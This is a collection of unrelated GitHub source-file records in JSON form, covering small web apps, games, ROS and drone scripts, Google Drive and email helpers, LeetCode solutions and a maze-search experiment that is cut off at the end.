+{"seq_id":"1246453733","text":"from fastapi import APIRouter, Query\nfrom db import Mongo, AMZRDS\nimport model\n\nrouter = APIRouter(\n prefix=\"/test\",\n)\n\n@router.get(\"/db/{db_type}\")\n# 测试数据库读\ndef get_db(db_type: str, id=Query(1)):\n if db_type == 'mongo':\n client = Mongo()\n print(client)\n conn = client.get_connection()\n # 读取 test 集合的指定 id 数据\n data = conn.test.find_one({\"_id\": id})\n elif db_type == 'mysql':\n client = AMZRDS()\n print(client)\n conn = next(client.get_connection())\n # 读取 test 表的指定 id 数据\n data = conn.query(model.Test).filter(model.Test.id == id).first()\n\n return {\n \"data\": data\n }\n\n\n@router.post(\"/db/{db_type}\")\n# 测试数据库写\ndef set_db(db_type: str, id=Query(1), val=Query(\"test\")):\n if db_type == 'mongo':\n conn = Mongo().get_connection()\n # 写入 test 集合的指定 id 数据\n conn.test.update_one({\"_id\": id}, {\"$set\": {\"val\": val}}, upsert=True)\n elif db_type == 'mysql':\n conn = next(AMZRDS().get_connection())\n # 写入 test 表的指定 id 数据\n obj = conn.query(model.Test).filter(model.Test.id == id).first()\n if obj is not None:\n conn.query(model.Test).filter(\n model.Test.id == id).update({\"val\": val})\n else:\n obj = model.Test(val)\n conn.add(obj)\n conn.commit()\n\n return {\n \"state\": \"success\"\n }","repo_name":"KKCHANNEL-kk/easetrip-service","sub_path":"router/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"74724157985","text":"##########################################\n\"\"\"\nLab:8 Objectives\n- Have Different Obstacles\n\"\"\"\n##########################################\nimport pygame\nfrom dinoGame.elements import Track, Dinosaur, Cloud\nfrom dinoGame.elements import LargeCactus, Bird, SmallCactus\n\n# Initialize Pygame\npygame.init()\n\nSCREEN_HEIGHT = 600 # Enter the window Height\nSCREEN_WIDTH = 1100 # Enter the window Width\nSCREEN = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n\n\nalive = True\n\ntotal_score = 0\n\nwhile alive:\n\n SCREEN.fill((255, 255, 255))\n font = pygame.font.Font('freesansbold.ttf', 30)\n text = font.render(\"Press any Key to Start\", True, (0, 0, 0))\n textRect = text.get_rect()\n textRect.center = (SCREEN_WIDTH // 2, SCREEN_HEIGHT // 3)\n SCREEN.blit(text, textRect)\n\n text_score = font.render(f\"Score: {total_score}\", True, (0, 0, 0))\n score_Rect = text_score.get_rect()\n score_Rect.center = (SCREEN_WIDTH // 2, SCREEN_HEIGHT // 1.5)\n SCREEN.blit(text_score, score_Rect)\n\n pygame.display.update()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n alive = False\n elif event.type == pygame.KEYDOWN:\n ## Start Game\n ground = Track(SCREEN)\n dino = Dinosaur(SCREEN)\n cloud = Cloud(SCREEN)\n clock = pygame.time.Clock()\n obstacle = None\n\n game_score = 0\n\n run = True\n while run:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n continue\n ##########Have Different Obstacles#########\n if obstacle == None:\n obstacle = LargeCactus(SCREEN)\n ###########################################\n\n ## Update The Elements\n user_input = pygame.key.get_pressed()\n dino.update(user_input)\n ground.update()\n cloud.update()\n obstacle.update()\n\n ### Draw All Layers\n SCREEN.fill((255,255,255))\n ground.draw()\n dino.draw()\n cloud.draw()\n obstacle.draw()\n\n if dino.dino_rect.colliderect(obstacle.rect):\n total_score = game_score\n break\n\n if obstacle.rect.x <= -obstacle.rect.width:\n obstacle = None\n game_score += 1\n\n text = font.render(\"Points: \" + str(game_score), True, (0, 0, 0))\n textRect = text.get_rect()\n textRect.center = (SCREEN_WIDTH/2, SCREEN_HEIGHT/4)\n SCREEN.blit(text, textRect)\n\n clock.tick(30)\n pygame.display.update()\npygame.quit()","repo_name":"harshmittal2210/PyCon2023-YLW","sub_path":"Tutorials/6_Game/lab8.py","file_name":"lab8.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"40672637788","text":"from pymongo import MongoClient\nfrom flask import Flask, render_template, redirect\nimport scrape_mars\n\nmongo = MongoClient(\"mongodb://localhost:27017/mars_db\")\n\napp = Flask(__name__)\n\n# Create route to query mongoDB and pass data into html template\n@app.route(\"/\")\ndef index ():\n\n final_dict = mongo.db.mars_data.find_one()\n return render_template(\"index.html\", data=final_dict) \n\n@app.route(\"/scrape\")\ndef scrape():\n\n scrape_data = scrape_mars.scrape()\n mongo.db.mars_data.update({}, scrape_data, upsert=True)\n return redirect (\"/\")\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n\n\n","repo_name":"brianroberts778/Mars_NASA_Web_Scraper","sub_path":"Mission_to_Mars/mars_app.py","file_name":"mars_app.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"21698908474","text":"import rospy\nimport py_trees\nimport py_trees_ros\nimport threading\nfrom project11_msgs.msg import BehaviorInformation\nfrom geographic_msgs.msg import GeoPoseStamped\nfrom nav_msgs.msg import Odometry\nimport time\n\nbhv_bb = py_trees.blackboard.Blackboard()\n\n# Set up some test variables to artificaily set states for debugging.\ntestvalues = {'debug': True,\n 'emergency': False,\n 'location_unknown':True,\n 'on_surface': True}\n\nfor k,v in testvalues.items():\n bhv_bb.set('test.'+k,v, overwrite=True)\n\n# This class inherits the py_trees_ros.subscribers.ToBlackboard object, \n# allowing one to create a blackboard separately and provide it, rather \n# than creating one on the fly. In this version of py_trees/py_trees_ros\n# there is no Client object for access the blackboard created with the \n# standard ToBlackboard() object. \nclass ToLocalBlackboard(py_trees_ros.subscribers.ToBlackboard):\n def __init__(self,blackboard,**kwargs):\n super(ToLocalBlackboard,self).__init__(**kwargs)\n self.ourblackboard = blackboard\n\n def setup(self, timeout):\n ret = super(ToLocalBlackboard,self).setup(timeout)\n # Resets the blackboard to our blackboard.\n self.blackboard = self.ourblackboard\n return ret\n \n def update(self,**kwargs):\n ret = super(ToLocalBlackboard,self).update(**kwargs)\n if self.name=='behaviorparam2BB':\n print(self.subscriber.get_num_connections())\n print(self.msg)\n print(self.topic_name)\n print(self.name + \":\" + self.feedback_message)\n print(ret)\n #ret = py_trees.common.Status.SUCCESS\n return ret\n\n\nclass ToBB(py_trees.behaviour.Behaviour):\n ''' A class to write data from ROS messages to the py_trees blackboard.\n\n TODO: This was written out of frustration (see NOTE), and has all the \n subscribers hard-coded. It should be rewritten, submitting topics and \n message types to __init__().\n \n NOTE:\n This Behavior combines all the data acquisiton subscribers into one behavior \n writing their data to the blackboard. In this version of py_trees_ros/py_trees\n every attempt to use ToBlackboard() above with multiple behaviors, one for each\n subscriber failed. Data would be written by the fast data rate topics but omitted\n for the slow data rate topics. If the slow data rate topic is placed first in the \n sequence, no data would be written to the blackbaord at all. The cause for these\n problems might be in the architecture of the data acquisition branch of the tree\n (sequential vs parallel elements, memory=True/False, etc.), but every attempt \n resulted in failed attempts to get data into the blackboard reliably. My \n suspicion is that the thread lock (self.wireguard below) might have been\n monopolized by the high data rate topics and by combining the posting to the\n blackboard into a single threadlock here, the problem is solved. Not sure.\n'''\n def __init__(self, blackboard,**kwargs):\n\n super(ToBB,self).__init__(**kwargs)\n # Debugging tool.\n self.feedback_messages = {'bhvinfo':None,\n 'mesopos':None,\n 'asvinfo':None}\n # Place where messages received by subscribers are held.\n self.msgs = {'bhvinfo':None,\n 'mesopos':None,\n 'asvinfo':None}\n \n self.blackboard = blackboard\n self.data_guard = threading.Lock()\n\n self.input_subscriber = None\n self.mesobot_subscriber = None\n self.asv_subscriber = None\n\n # Will get the whole message\n self.blackboard_variable_mapping = {\"blackboard_variables\":None}\n self.clearing_policy = None\n\n def setup(self,timeout):\n self.input_subscriber = rospy.Subscriber('project11/behaviors/mesobot/input',\n BehaviorInformation,\n self.inputCB,\n queue_size=10)\n self.mesobot_subscriber = rospy.Subscriber('/project11/mesobot/nav/position',\n GeoPoseStamped,\n self.mesoCB,\n queue_size=10)\n self.asv_subscriber = rospy.Subscriber('project11/odom',\n Odometry,\n self.asvCB,\n queue_size=10)\n \n '''\n # Sets an empty set of data on setup.\n self.msgs['bhvinfo'] = BehaviorInformation()\n self.msgs['mesoinfo'] = GeoPoseStamped()\n self.msgs['asvinfo'] = Odometry()\n self.update()\n '''\n \n\n return True\n\n def inputCB(self,msg):\n #with self.data_guard:\n # self.msgs['bhvinfo'] = msg\n self.msgs['bhvinfo'] = msg\n \n def mesoCB(self,msg):\n #with self.data_guard:\n # self.msgs['mesoinfo'] = msg\n self.msgs['mesopos'] = msg\n\n def asvCB(self,msg):\n #with self.data_guard:\n # self.msgs['asvinfo'] = msg\n self.msgs['asvinfo'] = msg\n \n def update(self):\n \n haveMsgs = False\n for k, msg in self.msgs.items():\n if msg is not None:\n haveMsgs = True\n if not haveMsgs:\n return py_trees.common.Status.RUNNING\n \n \n # Look at self.msgs for new items.\n with self.data_guard:\n for kk, msg in self.msgs.items():\n #print(kk)\n #print(msg)\n\n # This code is directly from py_trees_ros/subscribers.py with only\n # msg = self.msg changed. It should apply the messages to the\n # blackboard within one \"data_guard\" mutex rather than individual ones.\n if msg is None:\n self.feedback_message = \"no \" + kk + \" message received yet\"\n #return py_trees.common.Status.RUNNING\n else:\n \n self.blackboard.set(kk, msg, overwrite=True)\n self.feedback_message = \" saved incoming message: \" + kk\n #if kk == 'bhvinfo':\n # print(msg)\n # this is of dubious worth, since the default setting of ClearingPolicy.ON_INITIALISE\n # covers every use case that we can think of.\n if self.clearing_policy == py_trees.common.ClearingPolicy.ON_SUCCESS:\n msg = None\n msg = None\n \n #print(time.asctime() + self.feedback_message)\n\n return py_trees.common.Status.SUCCESS\n","repo_name":"valschmidt/mesobot_behavior","sub_path":"src/mesobot_blackboard.py","file_name":"mesobot_blackboard.py","file_ext":"py","file_size_in_byte":6847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9789648862","text":"from pydrive.auth import GoogleAuth\nfrom pydrive.drive import GoogleDrive\n\n#this function gets our google drive info/credentials so we can use it\n#allows us to return the \"drive\" so we can upload/download stuff as needed\ndef client_auth():\n gauth = GoogleAuth()\n gauth.LoadCredentialsFile(\"user.txt\") #try to load credentials for gdrive\n\n if gauth.credentials is None:\n #we need to get them if they arent able to be loaded\n gauth.LocalWebserverAuth() # Creates local webserver and auto handles authentication.\n elif gauth.access_token_expired:\n gauth.Refresh()\n #refresh the creds if necessary\n else:\n gauth.Authorize()\n #using saved credentials and moving on\n gauth.SaveCredentialsFile(\"user.txt\")\n #this saves our credentials so we dont pop the webpage every opening\n\n drive = GoogleDrive(gauth)\n return drive #return usable list file\n\n#function to create our folder, to have stability within a users gdrives\n#default name is \"CalData\"\ndef create_folder():\n drive = client_auth()\n folder_metadata = {'title' : 'CalData', 'mimeType' : 'application/vnd.google-apps.folder'}\n folder = drive.CreateFile(folder_metadata)\n folder.Upload()\n\n#creates our .json file for our task data\ndef create_db():\n drive = client_auth()\n data = drive.CreateFile({'title': 'task_db.json'})\n data.Upload()\n return data['id'] # this is how you access file id\n #the id is returned so ideally we can keep track of this easily\n #probably write it to a file to easily parse in\n #file ID's dont mean too much security wise so its not \n\n#function to find our db folder\n#this function only searches the root directory \ndef find_db(): # this function finds if the file exists by search via ID\n drive = client_auth()\n file_list = drive.ListFile({'q': \"'root' in parents and trashed=false\"}).GetList()\n\n status = 0 #placeholder for the id\n\n for file1 in file_list:\n #print('title: %s, id: %s' % (file1['title'], file1['id']))\n if file1['title'] ==\"CalData\":\n status = file1['id'] #ripping the id string\n \n return status\n \n #need to find our db file by its gdrive ID\n\n#function creates a file within the folder specified by that hardcoded id\n#change this to be dynamic later\ndef db_to_folder():\n drive = client_auth()\n folder_id = find_db()\n file1 = drive.CreateFile({'title':'task_db.json', 'mimeType':'text/csv',\n \"parents\": [{\"kind\": \"drive#fileLink\",\"id\": folder_id}]})\n file1.Upload()\n\n#function to list what is in a folder\n#should find the db file id so we can use this function and pass it to the update db function\ndef ListFolder():\n drive = client_auth()\n filelist=[] #list of our files\n folder_id = find_db() #get our folder id\n file_list = drive.ListFile({'q': \"'%s' in parents and trashed=false\" % folder_id}).GetList()\n \n #iterate through the folder to find all our ids\n for f in file_list:\n if f['mimeType']=='application/vnd.google-apps.folder': # if folder\n filelist.append({\"id\":f['id'],\"title\":f['title'],\"list\":ListFolder(f['id'])})\n else:\n filelist.append({\"id\":f['id'],\"title\":f['title'],\"title1\":f['alternateLink']})\n \n db_file_id = 0 # temp for the file id\n for files in file_list:\n if files[\"title\"] == \"task_db.json\":\n db_file_id = files['id']\n\n return db_file_id\n\n#NEED TO GET THE DB FILE ID BEFORE USING THIS IN SHIPPABLE\n#function to update db file within subfolder, given the id of the file\ndef update_db():\n drive = client_auth()\n id = ListFolder()\n a=drive.auth.service.files().get(fileId=id).execute()\n a['title']=\"task_db.json\"\n file1 = drive.CreateFile({'id': id})\n content = file1.GetContentString()\n #this data allows us to test inserting to the json and updating it\n data = input(\"test string here:\")\n if data == \"delete\":\n file1.SetContentString(\"null\")\n else:\n file1.SetContentString(data)\n file1.Upload()\n \n update=drive.auth.service.files().update(fileId=id,body=a).execute()\n\n#download file based on file id\ndef download_db():\n file_id = ListFolder() # finds our database file id within its subfolder\n drive = client_auth()\n download_file = drive.CreateFile({'id': file_id})\n download_file.GetContentFile(\"task_db.json\") #downloading the file, \n\ndef main():\n create_folder()#create the directory\n db_to_folder() #establish our folder and create the db file within\n update_db() #update that db file\n download_db() #download back to houston\n\nif __name__ == '__main__':\n main()","repo_name":"alm0st907/simple_cal","sub_path":"source/gd_api/up_code.py","file_name":"up_code.py","file_ext":"py","file_size_in_byte":4629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"14077853333","text":"from django import forms\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom django.core.exceptions import ValidationError\nfrom .models import Profile\n\n\nclass RegistrationForm(UserCreationForm):\n email = forms.EmailField(required=True)\n\n class Meta:\n model = User\n fields = (\n 'username',\n 'first_name',\n 'last_name',\n 'email',\n 'password1',\n 'password2',\n )\n\n def save(self, commit=True):\n user = super(RegistrationForm, self).save(commit=False)\n user.first_name = self.cleaned_data['first_name']\n user.last_name = self.cleaned_data['last_name']\n user.email = self.cleaned_data['email']\n\n if commit:\n user.save()\n return user\n\n def clean_email(self):\n email = self.cleaned_data['email']\n if User.objects.filter(email=email).exists():\n raise ValidationError(\"Email already exists\")\n return email\n\n\nclass EditProfileForm(UserChangeForm):\n class Meta:\n model = User\n fields = (\n 'first_name',\n 'last_name',\n 'email',\n )\n\n\nclass ProfileForm(forms.ModelForm):\n class Meta:\n model = Profile\n fields = ('bio', 'mobile_number', 'gender', 'image')\n","repo_name":"momanyibiffon/Stock-Management-System---Django-web-App","sub_path":"accounts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"1245966754","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom webapp.models import Article, STATUS_CHOICES\nfrom django.http import HttpResponseNotAllowed, Http404\n\nfrom webapp.models import Article, STATUS_CHOICES\nfrom webapp.forms import ArticleForm\n\n\ndef index_view(request):\n\n articles = Article.objects.all()\n context = {\n 'articles': articles\n }\n return render(request, 'index.html', context)\n\n\ndef article_create(request, pk):\n # try:\n # article = Article.objects.get(pk=pk)\n # except Article.DoesNotExist:\n # raise Http404\n\n article = get_object_or_404(Article, pk=pk)\n\n context = {'article': article}\n return render(request, 'article_create.html', context)\n\n\ndef article_view(request):\n if request.method == \"GET\":\n return render(request, 'article_view.html', context={\n 'form': ArticleForm()\n })\n elif request.method == 'POST':\n form = ArticleForm(data=request.POST)\n if form.is_valid():\n article = Article.objects.create(\n description=form.cleaned_data['description'],\n maxdescription=form.cleaned_data['maxdescription'],\n status=form.cleaned_data['status'],\n date_completion=form.cleaned_data['date_completion']\n )\n return redirect('article_create', pk=article.pk)\n else:\n return render(request, 'article_view.html', context={\n 'form': form\n })\n else:\n return HttpResponseNotAllowed(permitted_methods=['GET', 'POST'])\n\ndef article_update_view(request, pk):\n article = get_object_or_404(Article, pk=pk)\n if request.method == \"GET\":\n form = ArticleForm(initial={\n 'description': article.description,\n 'maxdescription': article.maxdescription,\n 'status': article.status,\n 'date_completion': article.date_completion\n })\n return render(request, 'article_update.html', context={\n 'form': form,\n 'article': article\n })\n elif request.method == 'POST':\n form = ArticleForm(data=request.POST)\n if form.is_valid():\n # Article.objects.filter(pk=pk).update(**form.cleaned_data)\n article.description = form.cleaned_data['description']\n article.maxdescription = form.cleaned_data['maxdescription']\n article.status = form.cleaned_data['status']\n article.date_completion = form.cleaned_data['date_completion']\n article.save()\n return redirect('article_create', pk=article.pk)\n else:\n return render(request, 'article_update.html', context={\n 'article': article,\n 'form': form\n })\n else:\n return HttpResponseNotAllowed(permitted_methods=['GET', 'POST'])\n\ndef article_delete_view(request, pk):\n article = get_object_or_404(Article, pk=pk)\n if request.method == 'GET':\n return render(request, 'article_delete.html', context={'article': article})\n elif request.method == 'POST':\n article.delete()\n return redirect('index')\n\n\n\n\n\n","repo_name":"DaryaNov/homework45","sub_path":"source/webapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"4548474460","text":"class Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n island = []\n count = 0\n # def check_connected(x,y):\n # # print (f\"cordinates: {x,y}\")\n # # print (island)\n # for land in island:\n # if x>=1 and grid[x-1][y]==\"1\" and (x-1,y) in land:\n # # print(\"1\")\n # land.add((x,y))\n # return\n # if y>0 and grid[x][y-1]==\"1\" and (x,y-1) in land:\n # # print (\"2\")\n # land.add((x,y))\n # return\n # # print (\"3\")\n # tmp_set = set()\n # tmp_set.add((x,y))\n # island.append(tmp_set)\n def dfs(x,y):\n if x<0 or y<0 or y>=len(grid[0]) or x>=len(grid) or grid[x][y]!=\"1\":\n return\n grid[x][y]=\"#\"\n dfs(x-1,y)\n dfs(x+1,y)\n dfs(x,y+1)\n dfs(x,y-1)\n for x in range(len(grid)):\n for y in range(len(grid[0])):\n if grid[x][y]==\"1\":\n dfs(x,y)\n count+=1\n # print (len(island))\n return count","repo_name":"hasija/leetcode","sub_path":"200. Number of Islands.py","file_name":"200. Number of Islands.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"10323455147","text":"import inspect\n\nimport pytest\n\nfrom telethon import TelegramClient\n\n\n@pytest.mark.asyncio\nasync def test_send_message_with_file_forwards_args():\n arguments = {}\n sentinel = object()\n\n for value, name in enumerate(inspect.signature(TelegramClient.send_message).parameters):\n if name in {'self', 'entity', 'file'}:\n continue # positional\n\n if name in {'message'}:\n continue # renamed\n\n if name in {'link_preview'}:\n continue # make no sense in send_file\n\n arguments[name] = value\n\n class MockedClient(TelegramClient):\n # noinspection PyMissingConstructor\n def __init__(self):\n pass\n\n async def send_file(self, entity, file, **kwargs):\n assert entity == 'a'\n assert file == 'b'\n for k, v in arguments.items():\n assert k in kwargs\n assert kwargs[k] == v\n\n return sentinel\n\n client = MockedClient()\n assert (await client.send_message('a', file='b', **arguments)) == sentinel\n","repo_name":"LonamiWebs/Telethon","sub_path":"tests/telethon/client/test_messages.py","file_name":"test_messages.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":8393,"dataset":"github-code","pt":"70"}
+{"seq_id":"39428932348","text":"class Solution(object):\n def subsets(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n answer = []\n if len(nums) == 0:\n return answer\n \n res = []\n answer.append(list(res))\n self.dfs(nums, len(nums), 0, res, answer)\n \n return answer\n \n def dfs(self, nums, length, index, res, answer):\n if len(res) == length:\n return\n \n for i in range(index, length):\n res.append(nums[i])\n answer.append(list(res))\n self.dfs(nums, length, i + 1, res, answer)\n res.pop()\n","repo_name":"alen6697/leetcode-practice","sub_path":"Subsets.py","file_name":"Subsets.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"41523124246","text":"import sys\nimport ssl\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\nfrom app import config\n\n\ndef format_message(sender: str,\n receiver: str,\n subject: str,\n promotions: list[tuple[str]]) -> str:\n message = MIMEMultipart('alternative')\n message['Subject'] = subject\n message['From'] = sender\n message['To'] = receiver\n\n promos_text = '\\n'.join([(f'{p[0]} -> {p[1]}')\n for p in promotions])\n promos_html = '\\n'.join([(f'{p[0]} ')\n for p in promotions])\n\n text = f\"\"\"\\\nOlá! 😃\nForam encontradas novas ofertas para o produto que você estava monitorando.\nVocê pode conferi-las aqui:\n {promos_text}\n \"\"\"\n html = f\"\"\"\\\n\n \n Olá! 😃 \n Foram encontradas novas ofertas para o produto que você estava monitorando. \n Você pode conferi-las aqui:\n
\n
\n \n\n \"\"\"\n # Turn these into plain/html MIMEText objects.\n part1 = MIMEText(text, 'plain')\n part2 = MIMEText(html, 'html')\n # Add HTML/plain-text parts to MIMEMultipart message.\n # The email client will try to render the last part first.\n message.attach(part1)\n message.attach(part2)\n return message.as_string()\n\n\ndef send_email(sender: str,\n receiver: str,\n password: str,\n subject: str,\n promotions: list[tuple[str]]) -> None:\n message = format_message(sender, receiver, subject, promotions)\n context = ssl.create_default_context()\n try:\n with smtplib.SMTP_SSL('smtp.gmail.com', 465, context=context) as s:\n s.login(sender, password)\n s.sendmail(sender, receiver, message)\n except Exception as err:\n # Break point, can’t continue if email is not sent.\n config.LOGGER.error(f'{err}')\n sys.exit()\n","repo_name":"willy-r/jovem-padawan","sub_path":"app/send_email.py","file_name":"send_email.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"35768832267","text":"import time\nfrom pyardrone import ARDrone, at\nimport ThreadDistance\ndef init():\n uav = ARDrone()\n uav.navdata_ready.wait()\n print(\"ready\")\n uav.send(at.CONFIG('general:navdata_demo', True))\n time.sleep(0.1)\n print(\"send\")\n while uav.state.emergency_mask:\n print(\"emergency\")\n uav.send(at.REF(0b0100000000))\n time.sleep(1)\n print(\"ready\")\n return uav\n\n\ndef get_data(drone): #get money, get bitches, get DATA <3\n altitude = drone.navdata.demo.altitude\n vx = drone.navdata.demo.vx\n vy = drone.navdata.demo.vy\n vz = drone.navdata.demo.vz\n phi = drone.navdata.demo.phi\n psi = drone.navdata.demo.psi\n theta = drone.navdata.demo.theta\n return (altitude, vx, vy, vz, phi, psi, theta)\n\n\ndef data_print(drone, previous_data):\n current_data = get_data(drone)\n if (previous_data!=current_data):\n print(\"Altitude: \", previous_data[0], \"\\t vx: \", previous_data[1], \"\\t vy: \", previous_data[2], \"\\t vz: \", previous_data[3], \"\\t phi: \", previous_data[4], \"\\t psi: \", previous_data[5],\n \"\\t theta: \", previous_data[6])\n return(current_data)\n\ndrone = init()\nprint(\"connecting\")\nprevious_data = get_data(drone)\n\nprevious_data = data_print(drone, previous_data)\n\nspeed = 0.1\nActionTime = 2\nSleepTime = 1\n\nwhile not drone.state.fly_mask:\n drone.takeoff()\n print(\"Vlieg op!\")\n\nprint(\"JA baas\")\n\ndrone.hover()\nprint(\"hover\")\ntime.sleep(SleepTime*3)\n\nprint(\"Omhoog\")\ntimeout = time.time() + ActionTime\nwhile True:\n drone.move(up=speed*4)\n previous_data = data_print(drone, previous_data)\n if time.time() > timeout:\n drone.move(up=0)\n break\n\ndrone.hover()\nprint(\"hover\")\ntime.sleep(SleepTime)\n\nprint(\"Vooruit met die geit\")\ntimeout = time.time() + ActionTime\nwhile True:\n drone.move(forward=speed)\n previous_data = data_print(drone, previous_data)\n if time.time() > timeout:\n drone.move(forward=0)\n break\n\ndrone.hover()\nprint(\"hover\")\ntime.sleep(SleepTime)\n\nprint(\"Rechts\")\ntimeout = time.time() + ActionTime\nwhile True:\n drone.move(right=speed)\n previous_data = data_print(drone, previous_data)\n if time.time() > timeout:\n drone.move(right=0)\n break\n\ndrone.hover()\nprint(\"hover\")\ntime.sleep(SleepTime)\n\nprint(\"en een stapje terug\")\ntimeout = time.time() + ActionTime\nwhile True:\n drone.move(backward=speed)\n previous_data = data_print(drone, previous_data)\n if time.time() > timeout:\n drone.move(backward=0)\n break\n\ndrone.hover()\nprint(\"hover\")\ntime.sleep(SleepTime)\n\nprint(\"Links\")\ntimeout = time.time() + ActionTime\nwhile True:\n drone.move(left=speed)\n previous_data = data_print(drone, previous_data)\n if time.time() > timeout:\n drone.move(left=0)\n break\n\ndrone.hover()\nprint(\"hover\")\ntime.sleep(SleepTime)\n\nprint(\"Omlaag\")\ntimeout = time.time() + ActionTime\nwhile True:\n drone.move(down=speed*4)\n previous_data = data_print(drone, previous_data)\n if time.time() > timeout:\n drone.move(down=0)\n break\n\nprint(\"klaar\")\n\nwhile drone.state.fly_mask:\n drone.land()\n # print(\"ga landen maat\")\n\nprint(\"doei\")\n\nprevious_data = data_print(drone, previous_data)\nexit()\n","repo_name":"kwint/UAV-test","sub_path":"Nextcloud/1. School/UAV/UseDataToMove.py","file_name":"UseDataToMove.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"13803260754","text":"import sys\nimport time\nimport math\nfrom tqdm import tqdm\nimport json\nimport os\n\n\nfrom project2_config import PS, NUM_EXPERIMENT\nfrom algorithm import RepeatedForwardAStar\n\nsys.path.append('..\\\\..\\\\XLQ_test\\\\Final_version')\nfrom algorithm import AStar\nfrom maze_1 import Cell, Maze\n\n\ndef euclidean_heuristic(cell1: Cell, cell2: Cell):\n x1, y1 = cell1.position\n x2, y2 = cell2.position\n return math.sqrt(math.pow((x1 - x2), 2) + math.pow((y1 - y2), 2))\n\n\ndef format_path_data(data_path):\n formated_path=[]\n for data in data_path:\n formated_path.append(data.get_position())\n return formated_path\n\ndef test(dim: int, num_experiment=NUM_EXPERIMENT):\n # data=[0]*len(Q9_QS)\n # print(Q9_QS)\n # print(data)\n data_time_bump = [0.0] * len(PS)\n data_path_bump = [0.0] * len(PS)\n data_time_repeat = [0.0] * len(PS)\n data_path_repeat = [0.0] * len(PS)\n\n record_path_in_bump=[]\n record_path_in_repeat=[]\n\n for index_p, p in enumerate(PS):\n count = 0\n sub_record_path_in_bump=[]\n sub_record_path_in_repeat = []\n for random_seed in tqdm(range(num_experiment)):\n maze = Maze(dim, dim)\n maze.initialize_maze(p, random_seed=random_seed)\n goal_cell = Cell((dim - 1, dim - 1))\n start_cell = Cell((0, 0))\n astar_search=AStar(maze, euclidean_heuristic)\n astar_path=astar_search.search(start_cell, goal_cell)\n if len(astar_path)==0:\n continue\n count+=1\n repeat_forward_astar=RepeatedForwardAStar(maze, euclidean_heuristic)\n\n start_time=time.time()\n path_repeat=repeat_forward_astar.search(start_cell, goal_cell)\n time_repeat=time.time()-start_time\n\n start_time=time.time()\n path_bump=repeat_forward_astar.search(start_cell, goal_cell, only_bump=True)\n time_bump=time.time()-start_time\n\n data_time_repeat[index_p]+=time_repeat\n data_time_bump[index_p]+=time_bump\n\n data_path_repeat[index_p]+=len(path_repeat)\n data_path_bump[index_p]+=len(path_bump)\n\n sub_record_path_in_repeat.append(format_path_data(path_repeat))\n sub_record_path_in_bump.append(format_path_data(path_bump))\n\n record_path_in_repeat.append(sub_record_path_in_repeat)\n record_path_in_bump.append(sub_record_path_in_bump)\n\n if count!=0:\n # average_data_time=data_time/count\n data_path_repeat[index_p]=data_path_repeat[index_p]/count\n data_path_bump[index_p]=data_path_bump[index_p]/count\n data_time_repeat[index_p]=data_time_repeat[index_p]/count\n data_time_bump[index_p]=data_time_bump[index_p]/count\n return data_path_repeat, data_time_repeat, data_path_bump, data_time_bump,record_path_in_repeat, record_path_in_bump\n\n\n\n\nif __name__ == '__main__':\n dim = 101\n data_path_repeat, data_time_repeat, data_path_bump, data_time_bump,record_path_in_repeat, record_path_in_bump = test(dim, NUM_EXPERIMENT)\n path=\"D:\\\\520\\\\data\"\n\n filename=\"repeatforwardAStar_path_average.json\"\n current_path=os.path.join(path,filename)\n with open(current_path,\"w\") as file_writer:\n data=json.dumps(data_path_repeat)\n file_writer.write(data)\n\n filename=\"bumprepeatforwardAStar_path_average.json\"\n current_path = os.path.join(path, filename)\n with open(current_path, \"w\") as file_writer:\n data = json.dumps(data_path_bump)\n file_writer.write(data)\n\n filename = \"repeatforwardAStar_time_average.json\"\n current_path = os.path.join(path, filename)\n with open(current_path, \"w\") as file_writer:\n data = json.dumps(data_time_repeat)\n file_writer.write(data)\n\n filename = \"bumprepeatforwardAStar_time_average.json\"\n current_path = os.path.join(path, filename)\n with open(current_path, \"w\") as file_writer:\n data = json.dumps(data_time_bump)\n file_writer.write(data)\n\n filename = \"repeatforwardAStar_path.json\"\n current_path = os.path.join(path, filename)\n with open(current_path, \"w\") as file_writer:\n data = json.dumps(record_path_in_repeat)\n file_writer.write(data)\n\n filename = \"bumprepeatforwardAStar_path.json\"\n current_path = os.path.join(path, filename)\n with open(current_path, \"w\") as file_writer:\n data = json.dumps(record_path_in_bump)\n 